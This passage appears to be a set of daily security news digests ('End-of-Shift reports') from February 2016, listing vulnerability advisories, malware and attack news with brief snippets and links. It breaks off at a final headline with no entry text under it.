*** SC Congress: "flakey kettles and dolls that swear at you" ***
---------------------------------------------
Ken Munro, managing director of Pen Test Partners, showed the SC Congress just how easy it is to crack a whole range of IoT nonsense
---------------------------------------------
http://www.scmagazine.com/sc-congress-flakey-kettles-and-dolls-that-swear-a…
*** Determining Physical Location on the Internet ***
---------------------------------------------
Interesting research: "CPV: Delay-based Location Verification for the Internet": Abstract: The number of location-aware services over the Internet continues growing. Some of these require the client's geographic location for security-sensitive applications. Examples include location-aware authentication, location-aware access policies, fraud prevention, complying with media licensing, and regulating online gambling/voting. An adversary can evade existing geolocation techniques, e.g.,...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/02/determining_phy.html
*** New Trojan threatens users' bank accounts ***
---------------------------------------------
February 12, 2016. Banking Trojans are considered to be one of the most dangerous threats. Not only do they have a complex architecture, but they are also capable of performing a wide variety of functions. Yet some attackers do not disdain to contrive rather primitive malicious programs such as, for example, Trojan.Proxy2.102, which was examined by Doctor Web specialists. Trojan.Proxy2.102 steals money from victims' bank accounts using the following method. Once launched, it installs a root...
---------------------------------------------
http://news.drweb.com/show/?i=9840&lng=en&c=9
*** Increased scans and workarounds for Cisco's ASA vulnerability ***
---------------------------------------------
The attackers are apparently already actively gathering information on potentially vulnerable systems, while the defenders are still struggling with the pitfalls of the update.
---------------------------------------------
http://heise.de/-3100443
*** Download.com and Others Bundle Superfish-Style HTTPS Breaking Adware ***
---------------------------------------------
It's a scary time to be a Windows user. Lenovo was bundling HTTPS-hijacking Superfish adware, Comodo ships with an even worse security hole called PrivDog, and dozens of other apps like LavaSoft are doing the same. It's really bad, but if you want your encrypted web sessions to be hijacked just head to CNET Downloads or any freeware site, because they are all bundling HTTPS-breaking adware now.
---------------------------------------------
http://www.howtogeek.com/210265/download.com-and-others-bundle-superfish-st…
*** How to Avoid Potentially Unwanted Programs ***
---------------------------------------------
We've come up with a PUPs cheat sheet that businesses can use to train IT staff and users. A little PUPs awareness, if you will. Read on to learn more about how you get PUPs.
---------------------------------------------
https://blog.malwarebytes.org/online-security/2016/02/how-to-avoid-potentia…
*** How to use the traffic light protocol - TLP ***
---------------------------------------------
The TLP or Traffic Light Protocol is a set of designations designed to help sharing of sensitive information. It has been widely adopted in the CSIRT and security community. The originator of the information labels the information with one of four colours. These colours indicate what further dissemination, if any, can be undertaken by the recipient. Note that the colours only mark the level of dissemination, not the sensitivity level (although they often align).
---------------------------------------------
https://www.vanimpe.eu/2015/08/21/use-traffic-light-protocol-tlp/
*** D-Link DSL-2750B Remote Command Execution ***
---------------------------------------------
Risk: High. After some playing around I've noticed something interesting during the login phase: by sending wrong credentials, the user is redirec...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020128
*** Sophos UTM 9 Cross Site Scripting ***
---------------------------------------------
Risk: Low. Vendor: Sophos (https://www.sophos.com). Affected Products/Versions: Produc...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020117
*** ASUS Router Administrative Interface Exposure ***
---------------------------------------------
Risk: Low. Asus wireless routers running ASUSWRT firmware (in other words, anything with an RT- in the model name) have a design flaw in w...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020116
*** ZCM 11.3.x - Fix for CVE-2015-5970 ZCM ZENworks ChangePassword XPath Injection Information Disclosure Vulnerability - See TID 7017240 ***
---------------------------------------------
Abstract: Vulnerability overview: CVE-2015-5970. An XPath injection exists in the ChangePassword RPC method implementation. By combining this with an entity reference to a file on the appliance, an attacker can exfiltrate arbitrary text files from the vulnerable device. This issue has been found and reported by cpnrodzc7 working with HP's Zero Day Initiative (ZDI-CAN-3136). Patch overview: This patch contains the necessary files and installation information to correct the above issue on ZCM 11.3.x
---------------------------------------------
https://download.novell.com/Download?buildid=vt0EO0DgaX8~
*** ZCM 11.4.x - Fix for CVE-2015-5970 ZCM ZENworks ChangePassword XPath Injection Information Disclosure Vulnerability - See TID 7017240 ***
---------------------------------------------
Abstract: Vulnerability overview: CVE-2015-5970. An XPath injection exists in the ChangePassword RPC method implementation. By combining this with an entity reference to a file on the appliance, an attacker can exfiltrate arbitrary text files from the vulnerable device. This issue has been found and reported by cpnrodzc7 working with HP's Zero Day Initiative (ZDI-CAN-3136). Patch overview: This patch contains the necessary files and installation information to correct the above issue on ZCM 11.4.x
---------------------------------------------
https://download.novell.com/Download?buildid=SOM6P0NdZ5U~
*** PostgreSQL Bugs Let Remote Users Deny Service and Let Remote Authenticated Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1035005
*** DFN-CERT-2016-0260: Mozilla Firefox, Firefox ESR: Two vulnerabilities allow, among other things, the bypassing of security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0260/
*** DFN-CERT-2016-0263: Cacti: Multiple vulnerabilities allow, among other things, the execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0263/
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 10-02-2016 18:00 − Donnerstag 11-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Critical bug found in Cisco ASA products, attackers are scanning for affected devices ***
---------------------------------------------
Several Cisco Adaptive Security Appliance (ASA) products - appliances, firewalls, switches, routers, and security modules - have been found sporting a flaw that can ultimately lead to remote code exec...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19427
*** Some notes on VirusTotal. ***
---------------------------------------------
Many of you are probably familiar with VirusTotal, a service that allows you to scan a file or URL using multiple antivirus and URL scanners. VirusTotal results are often used in write-ups about...
---------------------------------------------
http://www.webroot.com/blog/2016/02/09/some-notes-on-virustotal/
*** Seo-moz.com SEO Spam Campaign ***
---------------------------------------------
Here at Sucuri we handle countless cases of SEO spam. This malware involves a website being compromised in order to spread (mostly pharmaceutical) advertisements by linking visitors to unwanted websites and stuffing spam keywords into the site. These links and keywords help the spam websites to rank higher in search engines like Google, sending even...
---------------------------------------------
https://blog.sucuri.net/2016/02/seo-moz-com-seo-spam-campaign.html
*** Malvertising Via Skype Delivers Angler ***
---------------------------------------------
A recent malvertising campaign shows that platforms that display ads, even when they are not necessarily the browser, are not immune to the attack. An example of a popular non-browser application that shows ads is Skype. These images would be familiar to avid Skype users. This did not really bother us much until last night, when we...
---------------------------------------------
https://labsblog.f-secure.com/2016/02/10/malvertising-via-skype-delivers-an…
*** Tomcat IR with XOR.DDoS, (Thu, Feb 11th) ***
---------------------------------------------
Apache Tomcat is a Java-based web service that is used for different applications. While you may have it running in your environment, you may not be familiar with its workings to provide adequate incident response.
0 S root 31847 1 0 80 0 - 1124641 futex_ 2015 ? 02:36:33 /usr/bin/java -classpath /usr/share/apache-tomcat-7.0.65/bin/bootstrap.jar
Here you can see that it is running from /usr/share/apache-tomcat-7.0.65. The Tomcat configurations ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20721&rss
*** Building automation systems are so bad IBM hacked one for free ***
---------------------------------------------
Remote sites owned as router, controller and server all fall to pen-test team. An IBM-led penetration testing team has thoroughly owned an enterprise building management network in a free assessment designed to publicise the horrid state of embedded device security.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/02/11/building_au…
*** How Malware Detects Virtualized Environment, and its Countermeasures - An Overview ***
---------------------------------------------
Virtual machines are usually considered a good way to analyze malware, as they provide an isolated environment in which the malware can trigger while its actions are controlled and intercepted. However, modern malware detects the environment in which it is running, and if it detects that it is running in a VM, it sustains its...
---------------------------------------------
http://resources.infosecinstitute.com/how-malware-detects-virtualized-envir…
*** DFN-CERT-2016-0252: Cisco Adaptive Security Appliance Software: A vulnerability allows taking over control of the system ***
---------------------------------------------
A vulnerability in Cisco Adaptive Security Appliances Software allows a remote, unauthenticated attacker to execute arbitrary code and thereby take control of an affected system; carrying out a denial-of-service attack is also possible.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0252/
*** ZDI-16-163: Dell SonicWALL GMS Virtual Appliance Deserialization of Untrusted Data Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell SonicWALL GMS Virtual Appliance. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-163/
*** ZDI-16-164: Dell SonicWALL GMS Virtual Appliance Multiple Remote Code Execution Vulnerabilities ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell SonicWALL GMS Virtual Appliance. Authentication is required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-164/
*** Cisco Spark Representational State Transfer Interface Information Disclosure Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Spark Representational State Transfer Interface Unauthorized Access Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Spark Representational State Transfer Interface Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Advanced Malware Protection and Email Security Appliance Proxy Engine Security Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates ***
---------------------------------------------
A number of vulnerabilities have been identified in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway that could allow a malicious, unprivileged user to perform privileged operations or execute commands.
---------------------------------------------
https://support.citrix.com/article/CTX206001
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in libssh2 affects PowerKVM (CVE-2015-1782) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023318
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in curl affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023307
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects Tivoli Storage Manager Operations Center and Tivoli Storage Manager Client Management Service (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976362
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects AppScan Source (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976569
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in cpio affects PowerKVM (CVE-2014-9112) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023298
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Linux Kernel affects PowerKVM (CVE-2016-0728) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023279
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in OpenSSL affects IBM Netezza Platform Software clients (CVE-2015-3194) ***
http://www.ibm.com/support/docview.wss?uid=swg21976419
---------------------------------------------
*** IBM Security Bulletin: IBM Sterling Order Management is affected by Apache Commons Collections security vulnerabilities (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21975793
---------------------------------------------
*** IBM Security Bulletin: Cross-site scripting vulnerability in Liberty for Java for IBM Bluemix (CVE-2015-7417) ***
http://www.ibm.com/support/docview.wss?uid=swg21976218
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM JAVA Runtime affect AppScan Source (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21976159
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 09-02-2016 18:00 − Wednesday 10-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Fast Flux Bot Nets and Fluxer - Part 1 ***
---------------------------------------------
This time we'll start a two-parter on fast flux bot nets, including the concept of domain generation algorithms.
---------------------------------------------
http://www.scmagazine.com/fast-flux-bot-nets-and-fluxer--part-1/article/473…
*** DMA Locker Strikes Back ***
---------------------------------------------
A few days ago we published a post about a new ransomware - DMA Locker (read more here). At that time, it was using a pretty simple way of storing keys. Having the original sample was enough to recover files. Unfortunately, the latest version (discovered February 8th) comes with several improvements and an RSA key. Let's...
---------------------------------------------
https://blog.malwarebytes.org/news/2016/02/dma-locker-strikes-back/
*** Linode SSH key blunder left virtual servers open to man-in-the-middle fiddles for months ***
---------------------------------------------
Regen your keys ASAP. Web hosting biz Linode broke the security of its customers' virtual machines, allowing attackers to eavesdrop on SSH connections and hijack them.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/02/09/linode_ssh_…
*** Skimmers Hijack ATM Network Cables ***
---------------------------------------------
If you have ever walked up to an ATM to withdraw cash only to decide against it after noticing a telephone or ethernet cord snaking from behind the machine to a jack in the wall, your paranoia may not have been misplaced: ATM maker NCR is warning about skimming attacks that involve keypad overlays, hidden cameras and skimming devices plugged into the ATM network cables to intercept customer card data.
---------------------------------------------
http://krebsonsecurity.com/2016/02/skimmers-hijack-atm-network-cables/
*** Patchday: Microsoft plugs 6 critical holes, leaves old Internet Explorer versions in the lurch ***
---------------------------------------------
It is update time again for Microsoft users. Anyone still running older versions of Internet Explorer must act quickly now.
---------------------------------------------
http://heise.de/-3098499
*** The history of Cryptowall: a large scale cryptographic ransomware threat ***
---------------------------------------------
This tracker focuses on tracking the development changes in the CryptoWall ransomware; it does not attempt to track every single CryptoWall sample that exists. It simply exists to track the family at a higher level, and a few samples will be listed next to specific versions for reference rather than bulk collection. The timeline below shows the development track of CryptoWall, marking when new versions were first seen. Below the timeline you will find an overview.
---------------------------------------------
https://www.cryptowalltracker.org/
*** Sparkle installer: Gatekeeper protection for Macs can be bypassed ***
---------------------------------------------
Many Mac app developers use the Sparkle framework for convenient auto-updates, and thereby make numerous Mac programs vulnerable. Affected are not only VLC and uTorrent.
---------------------------------------------
http://www.golem.de/news/man-in-the-middle-angriff-sparkle-installer-macht-…
*** Cracking Damn Insecure and Vulnerable App (DIVA) - part 5: ***
---------------------------------------------
In the first four articles, we have discussed solutions for the first eleven challenges in DIVA. In this last article of this series, we will discuss the remaining two challenges that are related to native code. In case you missed the previous articles in this series, here are the links. http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable… http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable…
---------------------------------------------
http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable…
*** Hijacking forgotten & misconfigured subdomains ***
---------------------------------------------
It's been a while since my last blog post, so I decided to release a new tool. I think that we need more articles about "DNS hacking"; I hope that you will learn something new here.
---------------------------------------------
http://www.xexexe.cz/2016/02/hijacking-forgotten-misconfigured.html
*** Network forensic analysis tool NetworkMiner 2.0 released ***
---------------------------------------------
NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. ...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19421
*** MSRT February 2016 ***
---------------------------------------------
The February release of the Microsoft Malicious Software Removal Tool (MSRT) includes updated detections for the following malware families: Bladabindi, Gamarue, Sality, Kelihos, Diplugem. The updates include detections for the latest variants from these malware families. There were no new malware families added to the MSRT this month. The MSRT works in tandem with real-time...
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/02/09/msrt-february-2016/
*** MS16-FEB - Microsoft Security Bulletin Summary for February 2016 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS16-FEB
*** Deception: Shine Bright Like a Diamond ***
---------------------------------------------
German summary: Project plans, designs, customer data: every company's crown jewels must be kept hidden from cybercriminals under all circumstances, or must they? Cast out the bait, because now the good guys are doing the deceiving! Deception is the name of the new cyber-security approach which, according to estimates by the renowned market research firm Gartner, will be in use at around 10% of all companies by 2018. Virtual traps...
---------------------------------------------
http://blog.sec-consult.com/2016/02/deception-shine-bright-like-diamond.html
*** Tollgrade SmartGrid Sensor Management System Software Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for vulnerabilities in Tollgrade Communications, Inc.'s SmartGrid LightHouse Sensor Management System (SMS) Software EMS.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-040-01
*** Bugtraq: Safebreach advisory: Node.js HTTP Response Splitting (CVE-2016-2216) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537490
*** Bugtraq: ESA-2016-010 EMC Documentum xCP Security Update for Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537489
*** Bugtraq: dotDefender Firewall CSRF ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537491
*** [2016-02-10] Yeager CMS multiple vulnerabilities ***
---------------------------------------------
Yeager CMS suffers from multiple critical security issues including multiple SQL injections, arbitrary file upload, server-side request forgery and non-permanent cross-site scripting vulnerabilities. Unauthenticated attackers are able to compromise Yeager CMS in both application and database levels.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016…
*** DFN-CERT-2016-0237: Horde Application Framework: Two vulnerabilities allow a cross-site scripting attack ***
---------------------------------------------
09.02.2016
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0237/
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Collaboration Provisioning Local Privilege Escalation Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Application Policy Infrastructure Controller Enterprise Module Web Framework Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Video Communications Server Information Disclosure Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Unified Products Information Disclosure Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Unified Communications Manager Information Disclosure Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM SDK Java Technology Edition affect Liberty for Java for IBM Bluemix January 2016 CPU (CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21976217
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Security SiteProtector System (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976042
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM Flex System Manager (FSM) (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023319
---------------------------------------------
*** IBM Security Bulletin: IBM Pure Power Integrated Manager (PPIM) is affected by vulnerabilities in ntp (CVE-2014-9750, CVE-2014-9751) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023291
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Pure Power Integrated Manager (PPIM) (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023292
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects Watson Explorer (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974808
---------------------------------------------
*** IBM Security Bulletin: IBM Netezza SQL Extensions is vulnerable to an OpenSource PCRE Vulnerability (CVE-2015-8380, CVE-2015-8382, CVE-2015-8391) ***
http://www.ibm.com/support/docview.wss?uid=swg21976124
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities identified in IBM Java SDK affect WebSphere Service Registry and Repository Studio (CVE-2015-4872, CVE-2015-4911, CVE-2015-4893, CVE-2015-4803) ***
http://www.ibm.com/support/docview.wss?uid=swg21971058
---------------------------------------------
*** IBM Security Bulletin: A libxml vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-1819) ***
http://www.ibm.com/support/docview.wss?uid=swg21976393
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Mobile (CVE-2014-8121) ***
http://www.ibm.com/support/docview.wss?uid=swg21976290
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in nss-softokn affects IBM Security Access Manager for Mobile (CVE-2015-2730) ***
http://www.ibm.com/support/docview.wss?uid=swg21976295
---------------------------------------------
*** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by an OpenSSH vulnerability (CVE-2008-5161) ***
http://www.ibm.com/support/docview.wss?uid=swg21976082
---------------------------------------------
*** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by multiple NTP vulnerabilities ***
http://www.ibm.com/support/docview.wss?uid=swg21975967
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM MQ Light (CVE-2015-3197) ***
http://www.ibm.com/support/docview.wss?uid=swg21976345
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21975832
---------------------------------------------
*** IBM Security Bulletin: A Security Vulnerability has been identified in Apache Solr shipped with IBM Operations Analytics - Log Analysis ***
http://www.ibm.com/support/docview.wss?uid=swg21975544
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in cURL and libcURL affect IBM Security Access Manager (CVE-2014-3613, CVE-2014-8150) ***
http://www.ibm.com/support/docview.wss?uid=swg21974736
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM MQ Light (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976341
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 08-02-2016 18:00 − Tuesday 09-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Gate To Nuclear EK Uses Fake CloudFlare DDoS Check ***
---------------------------------------------
This rogue CloudFlare page hides a malicious payload.
---------------------------------------------
https://blog.malwarebytes.org/exploitkits/2016/02/gate-to-nuclear-ek-uses-f…
*** Patching Complex Web Vulnerabilities Using ModSecurity WAF ***
---------------------------------------------
In this blog post we will demonstrate complicated examples of common web application vulnerabilities, and see how they can be mitigated with ModSecurity WAF.
---------------------------------------------
https://www.htbridge.com/blog/patching-complex-web-vulnerabilities-using-mo…
*** It's 2016 and a font file can own your computer ***
---------------------------------------------
Libgraphite font library buggy and vulnerable in Firefox, Thunderbird, WordPad and more, says Talos. Cisco-owned Talos has announced a bunch of font library bugs present in apps running on Windows and Linux, affecting client- and server-side machines.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/02/09/libgraphite…
*** Power Grid Honeypot Puts Face on Attacks ***
---------------------------------------------
Researchers from MalCrawler built a honeypot mimicking an electronic management system at the heart of a power grid, exposing attackers' behavior once they have access to critical infrastructure systems.
---------------------------------------------
http://threatpost.com/power-grid-honeypot-puts-face-on-attacks/116217/
*** Russian hackers used malware to manipulate the Dollar/Ruble exchange rate ***
---------------------------------------------
Russian-language hackers have managed to break into Russian regional bank Energobank, infect its systems, and gain unsanctioned access to its trading system terminals, which allowed them to manipulat...
---------------------------------------------
http://www.net-security.org/malware_news.php?id=3201
*** How to Hack the Power Grid Through Home Air Conditioners ***
---------------------------------------------
Researchers show how hackers can manipulate the remote on-off device installed on some air conditioners to cause a blackout.
---------------------------------------------
http://www.wired.com/2016/02/how-to-hack-the-power-grid-through-home-air-co…
*** (Not only) Oracle Java Windows installer vulnerable ***
---------------------------------------------
Oracle has released an out-of-band patch for Java 6, 7 and 8 for Windows that closes a security hole in the installation process. Numerous media reports have already appeared about it, but they frequently ignore the fact that this is not a Java-specific vulnerability. The problem, keyword "Binary Planting",...
---------------------------------------------
http://www.cert.at/services/blog/20160209102305-1678.html
*** Security Bulletins Posted ***
---------------------------------------------
Security Bulletins for Adobe Photoshop and Bridge (APSB16-03), Flash Player (APSB16-04), Adobe Experience Manager (APSB16-05) and Adobe Connect (APSB16-07) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. This...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1315
*** DSA-3472 wordpress - security update ***
---------------------------------------------
Two vulnerabilities were discovered in wordpress, a web blogging tool. The Common Vulnerabilities and Exposures project identifies the following problems:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3472
*** DSA-3471 qemu - security update ***
---------------------------------------------
Several vulnerabilities were discovered in qemu, a full virtualization solution on x86 hardware.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3471
*** DSA-3470 qemu-kvm - security update ***
---------------------------------------------
Several vulnerabilities were discovered in qemu-kvm, a full virtualization solution on x86 hardware.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3470
*** DSA-3469 qemu - security update ***
---------------------------------------------
Several vulnerabilities were discovered in qemu, a full virtualization solution on x86 hardware.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3469
*** USN-2880-2: Firefox regression ***
---------------------------------------------
Ubuntu Security Notice USN-2880-2, 8th February, 2016: firefox regression.
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS.
Summary: USN-2880-1 introduced a regression in Firefox.
Software description: firefox - Mozilla Open Source web browser.
Details: USN-2880-1 fixed vulnerabilities in Firefox. This update introduced a regression which caused Firefox to crash on startup with some configurations. This update fixes the problem. We apologize
---------------------------------------------
http://www.ubuntu.com/usn/usn-2880-2/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 05-02-2016 18:00 − Monday 08-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Magento PCI Compliance Issues and Theft Over TLS ***
---------------------------------------------
With about 30% of the market share, Magento is gradually becoming a "WordPress" of the ecommerce world. Like WordPress, it becomes a major target for hackers due to its popularity. However, in the case of Magento, the main goal that hackers pursue is to steal money, either from shop customers or the shop owners. During...
---------------------------------------------
https://blog.sucuri.net/2016/02/theft-over-tls-or-illusion-of-pci-complianc…
*** Extracting and distributing information on incidents, or what is PROKI ***
---------------------------------------------
In the last blogpost, I promised to write something about our new project PROKI. PROKI is the abbreviation of the Czech phrase for "prediction and protection against cyber incidents" and in this project, our team set two goals for itself.
---------------------------------------------
http://en.blog.nic.cz/2016/02/05/extracting-and-distributing-information-on…
*** GitHub bug bounty hunting ***
---------------------------------------------
Last month, I went hunting for security bugs in GitHub, a popular platform for sharing and collaborating on code. After spending many hours mapping out GitHub's infrastructure, and testing for weaknesses without any significant results or leads, I shifted my focus to the service providers. This is a write-up about two of the issues I found, which both have since been addressed.
---------------------------------------------
https://medium.com/@ircbot/github-bug-bounty-hunting-741de324be1c
*** Netgear router software: vulnerability allows file upload and download ***
---------------------------------------------
The router management software Netgear Management System has a security problem. Attackers can choose between a remote code execution and a directory traversal vulnerability. So far there is no patch.
---------------------------------------------
http://www.golem.de/news/netgear-router-software-schwachstelle-ermoeglicht-…
*** ATM trick: withdraw cash, account balance stays the same ***
---------------------------------------------
Attacks on financial institutions are becoming ever more inventive. A new piece of malware credits amounts back to the account after they have been withdrawn at ATMs.
---------------------------------------------
http://futurezone.at/digital-life/bankomat-trick-geld-abheben-kontostand-bl…
*** T9000 backdoor steals documents, records Skype conversations, victims' actions ***
---------------------------------------------
A new backdoor Trojan with spyware capabilities is being used in targeted attacks against organizations based in the United States. It has been dubbed T9000, since it's a newer, improved version of th...
---------------------------------------------
http://www.net-security.org/malware_news.php?id=3199
*** Avast SafeZone Browser Lets Attackers Access Your Filesystem ***
---------------------------------------------
Just two days after Comodo's Chromodo browser was publicly shamed by Google Project Zero security researcher Tavis Ormandy, it's now Avast's turn to be scorned for failing to provide a "secure" browser for its users.
---------------------------------------------
http://news.softpedia.com/news/avast-safezone-browser-lets-attackers-access…
*** Adwind: FAQ ***
---------------------------------------------
Adwind is a cross-platform RAT, a multifunctional malware program which is distributed through a single malware-as-a-service platform. Different versions of the Adwind malware have been used in attacks against at least 443,000 private users, commercial and non-commercial organizations around the world.
---------------------------------------------
http://securelist.com/blog/research/73660/adwind-faq/
*** Java installer flaw shows why you should clear your Downloads folder ***
---------------------------------------------
On most computers, the default download folder quickly becomes a repository of old and unorganized files that were opened once and then forgotten about. A recently fixed flaw in the Java installer highlights why keeping this folder clean is important. On Friday, Oracle published a security advisory recommending that users delete all the Java installers they might have lying around on their computers and use new ones for versions 6u113, 7u97, 8u73 or later. The reason is that older Java...
---------------------------------------------
http://www.cio.com/article/3030707/security/java-installer-flaw-shows-why-y…
*** Netgear Pro NMS 300 Code Execution / File Download ***
---------------------------------------------
Topic: Netgear Pro NMS 300 Code Execution / File Download
Risk: High
Text: >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro ...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020070
*** Oracle Security Alert for CVE-2016-0603 - 5 February 2016 ***
---------------------------------------------
To be successfully exploited, this vulnerability requires that an unsuspecting user be tricked into visiting a malicious web site and download files into the user's system before installing Java SE 6, 7 or 8. Though relatively complex to exploit, this vulnerability may result, if successfully exploited, in a complete compromise of the unsuspecting user’s system.
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0603-28743…
*** Bugtraq: [security bulletin] HPSBGN03434 rev.1 - HP Continuous Delivery Automation using Java Deserialization, Remote Arbitrary Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537461
*** Bugtraq: [security bulletin] HPSBHF03431 rev.2 - HPE Network Switches, local Bypass of Security Restrictions, Indirect Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537460
*** 0Day Vulnerabilities in Advantech WebAccess ***
---------------------------------------------
